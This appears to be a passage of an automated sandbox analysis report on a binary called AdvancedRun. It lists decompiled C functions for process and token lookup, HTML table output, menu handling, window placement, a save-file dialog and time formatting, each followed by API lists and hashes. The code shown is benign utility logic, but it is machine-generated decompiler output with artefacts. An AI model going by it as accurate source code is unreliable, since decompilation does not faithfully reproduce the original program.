                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                  • String ID: netmsg.dll
                                                                  • API String ID: 2767993716-3706735626
                                                                  • Opcode ID: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                  • Instruction ID: 89adc518ee94488043421af4a237527fbec77c55aa854962abbb3bd0e0f931e1
                                                                  • Opcode Fuzzy Hash: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                  • Instruction Fuzzy Hash: 4F01D471200114FAEB152B61DD8AE9F7A6CEB46796B20417AFA02B60D1DB755E0086AC
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040598B, Relevance: 12.1, APIs: 8, Instructions: 96COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 90%
                                                                  			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				char _v72;
				void _v582;
				long _v584;
				void* __edi;
				intOrPtr _t27;
				wchar_t* _t34;
				wchar_t* _t42;
				long* _t43;
				int _t44;
				void* _t52;
				void* _t54;
				long _t56;
				long* _t57;
				void* _t60;

				_t60 = __eflags;
				_t52 = __edx;
				E004095AB( &_v72);
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				E004095FD(_t52, _t60,  &_v72);
				_t27 = 0;
				_v12 = 0;
				if(_v20 <= 0) {
					L10:
					_t56 = 0;
				} else {
					do {
						_t57 = E00405A92(_t27,  &_v32);
						if(E00409A94( *_t57,  &_v584) == 0) {
							goto L9;
						} else {
							_t34 =  &_v584;
							_push(_t34);
							_push(_a4);
							L0040B278();
							if(_t34 == 0) {
								L5:
								_t44 = 0;
								_t54 = OpenProcess(0x2000000, 0,  *_t57);
								if(_t54 == 0) {
									goto L9;
								} else {
									_v16 = _v16 & 0;
									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
										_t44 = 1;
										CloseHandle(_v16);
									}
									CloseHandle(_t54);
									if(_t44 != 0) {
										_t56 =  *_t57;
									} else {
										goto L9;
									}
								}
							} else {
								_t42 = wcschr( &_v584, 0x5c);
								if(_t42 == 0) {
									goto L9;
								} else {
									_t43 =  &(_t42[0]);
									_push(_t43);
									_push(_a4);
									L0040B278();
									if(_t43 != 0) {
										goto L9;
									} else {
										goto L5;
									}
								}
							}
						}
						goto L12;
						L9:
						_t27 = _v12 + 1;
						_v12 = _t27;
					} while (_t27 < _v20);
					goto L10;
				}
				L12:
				E004095DA( &_v72);
				return _t56;
			}





















                                                                  0x0040598b
                                                                  0x0040598b
                                                                  0x0040599a
                                                                  0x004059ae
                                                                  0x004059b5
                                                                  0x004059c1
                                                                  0x004059c6
                                                                  0x004059cb
                                                                  0x004059ce
                                                                  0x00405a7b
                                                                  0x00405a7b
                                                                  0x004059d4
                                                                  0x004059d4
                                                                  0x004059dc
                                                                  0x004059ee
                                                                  0x00000000
                                                                  0x004059f0
                                                                  0x004059f0
                                                                  0x004059f6
                                                                  0x004059f7
                                                                  0x004059fa
                                                                  0x00405a03
                                                                  0x00405a2b
                                                                  0x00405a2e
                                                                  0x00405a3c
                                                                  0x00405a40
                                                                  0x00000000
                                                                  0x00405a42
                                                                  0x00405a42
                                                                  0x00405a54
                                                                  0x00405a59
                                                                  0x00405a5a
                                                                  0x00405a5a
                                                                  0x00405a61
                                                                  0x00405a69
                                                                  0x00405a7f
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405a69
                                                                  0x00405a05
                                                                  0x00405a0e
                                                                  0x00405a17
                                                                  0x00000000
                                                                  0x00405a19
                                                                  0x00405a19
                                                                  0x00405a1c
                                                                  0x00405a1d
                                                                  0x00405a20
                                                                  0x00405a29
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405a29
                                                                  0x00405a17
                                                                  0x00405a03
                                                                  0x00000000
                                                                  0x00405a6b
                                                                  0x00405a6e
                                                                  0x00405a72
                                                                  0x00405a72
                                                                  0x00000000
                                                                  0x004059d4
                                                                  0x00405a81
                                                                  0x00405a84
                                                                  0x00405a8f

                                                                  APIs
                                                                  • memset.MSVCRT ref: 004059B5
                                                                    • Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                    • Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
                                                                    • Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                    • Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                    • Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                    • Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
                                                                    • Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
                                                                    • Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                    • Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
                                                                    • Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                    • Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                    • Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                  • _wcsicmp.MSVCRT ref: 004059FA
                                                                  • wcschr.MSVCRT ref: 00405A0E
                                                                  • _wcsicmp.MSVCRT ref: 00405A20
                                                                  • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                  • OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                  • CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
                                                                  • String ID:
                                                                  • API String ID: 768606695-0
                                                                  • Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                  • Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
                                                                  • Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                  • Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00407639, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 64%
                                                                  			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v68;
				char _v108;
				void _v160;
				void* __esi;
				signed int _t55;
				void* _t57;
				wchar_t* _t67;
				intOrPtr* _t73;
				signed int _t74;
				signed int _t86;
				signed int _t95;
				intOrPtr* _t98;
				void* _t100;
				void* _t102;

				_t73 = __ebx;
				_t74 = 0xd;
				_push(9);
				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
				_t102 = _t100 + 0x18;
				asm("movsw");
				E00407343(__ebx, _a4, L"<tr>");
				_t95 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
						_v8 = _t55;
						_t57 =  &_v160;
						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
							_t57 =  &_v68;
						}
						_t98 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t57;
						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
						E0040ADC0(_v28,  &_v108);
						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
						_t67 =  *(_t73 + 0x64);
						_t86 =  *_t67 & 0x0000ffff;
						if(_t86 == 0 || _t86 == 0x20) {
							wcscat(_t67, L"&nbsp;");
						}
						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
						_push( *((intOrPtr*)(_t73 + 0x68)));
						_push( &_v108);
						_push(_v12);
						_push(0x2000);
						_push( *((intOrPtr*)(_t73 + 0x60)));
						L0040B1EC();
						_t102 = _t102 + 0x1c;
						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
						_t95 = _t95 + 1;
					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
				}
				return E00407343(_t73, _a4, L"\r\n");
			}























                                                                  0x00407639
                                                                  0x00407646
                                                                  0x00407647
                                                                  0x00407654
                                                                  0x0040765f
                                                                  0x0040765f
                                                                  0x0040766b
                                                                  0x0040766d
                                                                  0x00407672
                                                                  0x00407677
                                                                  0x0040767d
                                                                  0x00407680
                                                                  0x00407686
                                                                  0x00407691
                                                                  0x00407697
                                                                  0x00407699
                                                                  0x00407699
                                                                  0x0040769c
                                                                  0x0040769f
                                                                  0x004076a3
                                                                  0x004076a7
                                                                  0x004076ab
                                                                  0x004076b5
                                                                  0x004076be
                                                                  0x004076c8
                                                                  0x004076de
                                                                  0x004076ee
                                                                  0x004076f1
                                                                  0x004076f4
                                                                  0x004076fa
                                                                  0x00407708
                                                                  0x0040770e
                                                                  0x00407718
                                                                  0x0040771d
                                                                  0x00407723
                                                                  0x00407724
                                                                  0x00407727
                                                                  0x0040772c
                                                                  0x0040772f
                                                                  0x00407734
                                                                  0x0040773f
                                                                  0x00407744
                                                                  0x00407745
                                                                  0x0040767d
                                                                  0x00407760

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: _snwprintfwcscat
                                                                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                  • API String ID: 384018552-4153097237
                                                                  • Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                  • Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
                                                                  • Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                  • Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040605E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 42%
                                                                  			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
				struct tagMENUITEMINFOW _v0;
				int _t24;
				wchar_t* _t30;
				intOrPtr _t32;
				int _t34;
				int _t42;
				signed int _t47;
				signed int _t48;

				_t36 = __ecx;
				_t48 = _t47 & 0xfffffff8;
				E0040B550(0x203c, __ecx);
				_t24 = GetMenuItemCount(_a8);
				_t34 = _t24;
				_t42 = 0;
				if(_t34 <= 0) {
					L13:
					return _t24;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a50, 0, 0x2000);
					_t48 = _t48 + 0xc;
					_a36 =  &_a48;
					_v0.cbSize = 0x30;
					_a4 = 0x36;
					_a40 = 0x1000;
					_a16 = 0;
					_a48 = 0;
					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
					if(_t24 == 0) {
						goto L12;
					}
					if(_a48 == 0) {
						L10:
						_t56 = _a20;
						if(_a20 != 0) {
							_push(0);
							_push(_a20);
							_push(_a4);
							_t24 = E0040605E(_t36, _t56);
							_t48 = _t48 + 0xc;
						}
						goto L12;
					}
					_t30 = wcschr( &_a48, 9);
					if(_t30 != 0) {
						 *_t30 = 0;
					}
					_t31 = _a16;
					if(_a20 != 0) {
						if(_a12 == 0) {
							 *0x40fe20 =  *0x40fe20 + 1;
							_t32 =  *0x40fe20; // 0x0
							_t31 = _t32 + 0x11558;
							__eflags = _t32 + 0x11558;
						} else {
							_t17 = _t42 + 0x11171; // 0x11171
							_t31 = _t17;
						}
					}
					_t24 = E00406025(_t31,  &_a48);
					_pop(_t36);
					goto L10;
					L12:
					_t42 = _t42 + 1;
				} while (_t42 < _t34);
				goto L13;
			}











                                                                  0x0040605e
                                                                  0x00406061
                                                                  0x00406069
                                                                  0x00406074
                                                                  0x0040607a
                                                                  0x0040607e
                                                                  0x00406082
                                                                  0x00406148
                                                                  0x0040614e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406088
                                                                  0x00406088
                                                                  0x00406093
                                                                  0x00406098
                                                                  0x0040609f
                                                                  0x004060ae
                                                                  0x004060b6
                                                                  0x004060be
                                                                  0x004060c6
                                                                  0x004060ca
                                                                  0x004060cf
                                                                  0x004060d7
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004060de
                                                                  0x00406129
                                                                  0x00406129
                                                                  0x0040612d
                                                                  0x0040612f
                                                                  0x00406130
                                                                  0x00406134
                                                                  0x00406137
                                                                  0x0040613c
                                                                  0x0040613c
                                                                  0x00000000
                                                                  0x0040612d
                                                                  0x004060e7
                                                                  0x004060f0
                                                                  0x004060f2
                                                                  0x004060f2
                                                                  0x004060f9
                                                                  0x004060fd
                                                                  0x00406102
                                                                  0x0040610c
                                                                  0x00406112
                                                                  0x00406117
                                                                  0x00406117
                                                                  0x00406104
                                                                  0x00406104
                                                                  0x00406104
                                                                  0x00406104
                                                                  0x00406102
                                                                  0x00406122
                                                                  0x00406128
                                                                  0x00000000
                                                                  0x0040613f
                                                                  0x0040613f
                                                                  0x00406140
                                                                  0x00000000

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$CountInfomemsetwcschr
                                                                  • String ID: 0$6
                                                                  • API String ID: 2029023288-3849865405
                                                                  • Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                  • Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
                                                                  • Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                  • Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00402BEE, Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 82%
                                                                  			E00402BEE(void* __ebx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				void* _t27;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				int _t41;
				int _t50;

				_t34 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
					return _t27;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v8 = GetSystemMetrics(0x4e);
					_v12 = GetSystemMetrics(0x4f);
					_t41 = GetSystemMetrics(0x4c);
					_t31 = GetSystemMetrics(0x4d);
					if(_v8 == 0 || _v12 == 0) {
						_v8 = GetSystemMetrics(0);
						_v12 = GetSystemMetrics(1);
						_t41 = 0;
						_t31 = 0;
					} else {
						_v8 = _v8 + _t41;
						_v12 = _v12 + _t31;
					}
					_t50 = _v20 - _v28;
					if(_t50 > 0x14) {
						_t38 = _v24;
						_t37 = _v16 - _t38;
						if(_t37 > 0x14 && _v20 > _t41 + 5) {
							_t31 = _t31 + 0xfffffff6;
							if(_t38 >= _t31) {
								_t31 = _v28;
								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
								}
							}
						}
					}
					return _t31;
				}
			}
















                                                                  0x00402bee
                                                                  0x00402bf8
                                                                  0x00402cae
                                                                  0x00402c08
                                                                  0x00402c10
                                                                  0x00402c11
                                                                  0x00402c12
                                                                  0x00402c13
                                                                  0x00402c20
                                                                  0x00402c27
                                                                  0x00402c2e
                                                                  0x00402c30
                                                                  0x00402c37
                                                                  0x00402c4b
                                                                  0x00402c50
                                                                  0x00402c53
                                                                  0x00402c55
                                                                  0x00402c3e
                                                                  0x00402c3e
                                                                  0x00402c41
                                                                  0x00402c41
                                                                  0x00402c5a
                                                                  0x00402c60
                                                                  0x00402c65
                                                                  0x00402c68
                                                                  0x00402c6d
                                                                  0x00402c77
                                                                  0x00402c7c
                                                                  0x00402c7e
                                                                  0x00402c87
                                                                  0x00402ca5
                                                                  0x00402ca5
                                                                  0x00402c87
                                                                  0x00402c7c
                                                                  0x00402c6d
                                                                  0x00000000
                                                                  0x00402cac

                                                                  APIs
                                                                  • GetSystemMetrics.USER32 ref: 00402C1C
                                                                  • GetSystemMetrics.USER32 ref: 00402C23
                                                                  • GetSystemMetrics.USER32 ref: 00402C2A
                                                                  • GetSystemMetrics.USER32 ref: 00402C30
                                                                  • GetSystemMetrics.USER32 ref: 00402C47
                                                                  • GetSystemMetrics.USER32 ref: 00402C4E
                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: MetricsSystem$Window
                                                                  • String ID:
                                                                  • API String ID: 1155976603-0
                                                                  • Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                  • Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
                                                                  • Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                  • Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004036D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E004036D5(void* __edi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char* _v24;
				char _v28;
				char* _v48;
				intOrPtr _v56;
				intOrPtr _v60;
				int _v64;
				int _v72;
				intOrPtr _v76;
				wchar_t* _v80;
				intOrPtr _v84;
				int _v92;
				char* _v96;
				intOrPtr _v104;
				struct tagOFNA _v108;
				void _v634;
				long _v636;
				void _v2682;
				char _v2684;
				void* __ebx;
				char _t37;
				intOrPtr _t38;
				int _t46;
				signed short _t54;

				_v636 = 0;
				memset( &_v634, 0, 0x208);
				_v2684 = 0;
				memset( &_v2682, 0, 0x7fe);
				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
				_v12 = _t37;
				_t38 =  *0x40cbf0; // 0x67
				_v8 = _t38;
				_v28 = E00405B81(0x227);
				_v24 = L"*.cfg";
				_v20 = E00405B81(0x228);
				_v16 = L"*.*";
				E00405236( &_v2684,  &_v28);
				_t54 = 0xa;
				_v60 = E00405B81(_t54);
				_v104 =  *((intOrPtr*)(__edi + 0x10));
				_v48 =  &_v12;
				_v96 =  &_v2684;
				_v108 = 0x4c;
				_v92 = 0;
				_v84 = 1;
				_v80 =  &_v636;
				_v76 = 0x104;
				_v72 = 0;
				_v64 = 0;
				_v56 = 0x80806;
				_t46 = GetSaveFileNameW( &_v108);
				if(_t46 != 0) {
					wcscpy( &_v636, _v80);
					return E0040365E(__edi, 1,  &_v636);
				}
				return _t46;
			}






























                                                                  0x004036ef
                                                                  0x004036f6
                                                                  0x0040370b
                                                                  0x00403712
                                                                  0x00403717
                                                                  0x0040371c
                                                                  0x0040371f
                                                                  0x0040372c
                                                                  0x00403735
                                                                  0x00403738
                                                                  0x00403744
                                                                  0x00403751
                                                                  0x00403758
                                                                  0x00403760
                                                                  0x00403769
                                                                  0x0040376c
                                                                  0x00403778
                                                                  0x0040377b
                                                                  0x0040378b
                                                                  0x00403792
                                                                  0x00403795
                                                                  0x00403798
                                                                  0x0040379b
                                                                  0x004037a2
                                                                  0x004037a5
                                                                  0x004037a8
                                                                  0x004037af
                                                                  0x004037b7
                                                                  0x004037c3
                                                                  0x00000000
                                                                  0x004037d4
                                                                  0x004037dc

                                                                  APIs
                                                                  • memset.MSVCRT ref: 004036F6
                                                                  • memset.MSVCRT ref: 00403712
                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                    • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                    • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                    • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                    • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                    • Part of subcall function 00405236: memset.MSVCRT ref: 00405257
                                                                    • Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
                                                                    • Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
                                                                    • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
                                                                    • Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
                                                                    • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA
                                                                  • GetSaveFileNameW.COMDLG32(?), ref: 004037AF
                                                                  • wcscpy.MSVCRT ref: 004037C3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
                                                                  • String ID: L$cfg
                                                                  • API String ID: 275899518-3734058911
                                                                  • Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                  • Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
                                                                  • Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                  • Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00404ED0, Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
				struct _SYSTEMTIME _v20;
				long _v276;
				long _v532;
				FILETIME* _t15;

				_t15 = __eax;
				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
						goto L5;
					} else {
						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
						wcscpy(_a4,  &_v276);
						wcscat(_a4, " ");
						wcscat(_a4,  &_v532);
					}
				} else {
					L5:
					wcscpy(_a4, 0x40c4e8);
				}
				return _a4;
			}







                                                                  0x00404ed0
                                                                  0x00404edf
                                                                  0x00404ef6
                                                                  0x00000000
                                                                  0x00404f00
                                                                  0x00404f1c
                                                                  0x00404f31
                                                                  0x00404f41
                                                                  0x00404f4e
                                                                  0x00404f5d
                                                                  0x00404f66
                                                                  0x00404f69
                                                                  0x00404f69
                                                                  0x00404f71
                                                                  0x00404f77
                                                                  0x00404f7d

                                                                  APIs
                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
                                                                  • GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
                                                                  • wcscpy.MSVCRT ref: 00404F41
                                                                  • wcscat.MSVCRT ref: 00404F4E
                                                                  • wcscat.MSVCRT ref: 00404F5D
                                                                  • wcscpy.MSVCRT ref: 00404F71
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                  • String ID:
                                                                  • API String ID: 1331804452-0
